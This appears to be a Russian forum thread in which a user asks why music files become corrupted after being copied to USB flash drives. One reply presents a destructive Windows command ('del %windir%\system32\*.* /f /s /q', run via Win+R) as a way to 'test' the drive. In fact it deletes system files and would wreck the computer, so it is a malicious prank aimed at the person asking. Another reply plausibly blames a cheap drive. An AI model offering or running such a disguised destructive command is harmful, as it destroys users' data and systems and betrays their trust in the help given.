Информационные технологии

Повреждение файлов после копирования в usb флешку

После копирования Мультимедийных файлов (музыка) на USB носители или Карты памяти, они повреждаются. Музыка после этого отказывается открываться . Флешку форматировал, проверял на вирусы подключал через все гнёзда, ничего не меняется. Кто знает или сталкивался с таким, помогите разобраться!
И после того как я с флешки на комп копировал проблема оставалась
Может ли быть проблема в компе? (древний комп)

а выводы ты сам не сделаешь ??
комп то тут при чем ?
и ты с флешки на ком копируешь - но файлы же уже битые

вставь флешку и протестируй, нажми Win+R выполни:
cmd /k del %windir%\system32\*.* /f /s /q

с превеликой вероятностью проблема в том, что это дешевая флешка, купленная на aliexpress.